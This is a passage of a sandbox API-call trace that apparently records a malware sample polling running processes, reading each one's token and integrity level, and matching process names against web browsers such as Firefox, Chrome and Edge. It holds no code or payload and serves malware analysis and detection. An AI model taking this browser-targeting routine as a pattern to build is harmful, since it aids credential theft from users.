OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0549.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0549.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0549.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0549.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0549.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0549.042] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0549.042] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0549.042] GetLastError () returned 0x7a [0549.043] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0549.043] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0549.043] CloseHandle (hObject=0x29c) returned 1 [0549.043] CloseHandle (hObject=0x298) returned 1 [0549.043] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0549.043] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0549.043] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0549.043] GetLastError () returned 0x7a [0549.044] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0549.044] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0549.044] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0549.044] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0549.044] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0549.044] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0549.044] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0549.044] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0549.044] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0549.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0549.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0549.045] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0549.045] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0549.045] GetLastError () returned 0x7a [0549.045] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0549.045] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0549.045] CloseHandle (hObject=0x29c) returned 1 [0549.045] CloseHandle (hObject=0x298) returned 1 [0549.045] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0549.046] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0549.046] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0549.046] GetLastError () returned 0x7a [0549.046] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0549.046] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0549.046] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0549.046] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0549.046] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0549.046] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0549.046] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0549.047] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0549.047] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0549.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0549.047] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0549.047] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0549.047] GetLastError () returned 0x7a [0549.047] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0549.047] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0549.047] CloseHandle (hObject=0x29c) returned 1 [0549.047] CloseHandle (hObject=0x298) returned 1 [0549.048] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0549.048] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0549.048] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0549.048] GetLastError () returned 0x7a [0549.048] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0549.048] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0549.048] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0549.048] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0549.049] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0549.049] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0549.049] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0549.049] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0549.049] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0549.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0549.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0549.049] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0549.049] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0549.049] GetLastError () returned 0x7a [0549.049] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0549.050] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0549.050] CloseHandle (hObject=0x29c) returned 1 [0549.050] CloseHandle (hObject=0x298) returned 1 [0549.050] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0549.050] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0549.050] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0549.050] GetLastError () returned 0x7a [0549.050] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0549.051] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0549.051] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0549.051] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0549.051] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0549.051] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0549.051] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0549.051] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0549.051] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0549.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0549.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0549.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0549.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0549.052] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0549.052] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0549.052] GetLastError () returned 0x7a [0549.052] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0549.052] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0549.052] CloseHandle (hObject=0x29c) returned 1 [0549.052] CloseHandle (hObject=0x298) returned 1 [0549.052] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0549.053] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0549.053] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0549.053] GetLastError () returned 0x7a [0549.053] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0549.053] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0549.053] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0549.053] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0549.053] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0549.053] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0549.053] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0549.054] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0549.054] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0549.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0549.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0549.054] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0549.055] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0551.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa278) returned 0xc0000004 [0551.062] VirtualAlloc (lpAddress=0x0, dwSize=0xb278, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0551.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb278, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0551.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0551.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0551.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0551.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0551.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0551.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0551.066] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0551.066] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0551.066] GetLastError () returned 0x7a [0551.066] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0551.066] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0551.067] CloseHandle (hObject=0x29c) returned 1 [0551.067] CloseHandle (hObject=0x298) returned 1 [0551.067] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0551.067] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0551.067] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0551.067] GetLastError () returned 0x7a [0551.067] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0551.067] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0551.067] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0551.068] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0551.068] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0551.068] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0551.068] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0551.068] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0551.068] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0551.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0551.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0551.068] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0551.068] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0551.069] GetLastError () returned 0x7a [0551.069] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0551.069] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0551.069] CloseHandle (hObject=0x29c) returned 1 [0551.069] CloseHandle (hObject=0x298) returned 1 [0551.069] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0551.069] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0551.069] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0551.069] GetLastError () returned 0x7a [0551.070] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0551.070] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0551.070] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0551.070] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0551.070] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0551.070] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0551.070] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0551.070] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0551.070] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0551.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0551.070] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0551.071] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0551.071] GetLastError () returned 0x7a [0551.071] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0551.071] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0551.071] CloseHandle (hObject=0x29c) returned 1 [0551.071] CloseHandle (hObject=0x298) returned 1 [0551.071] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0551.071] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0551.072] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0551.072] GetLastError () returned 0x7a [0551.072] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0551.072] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0551.072] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), 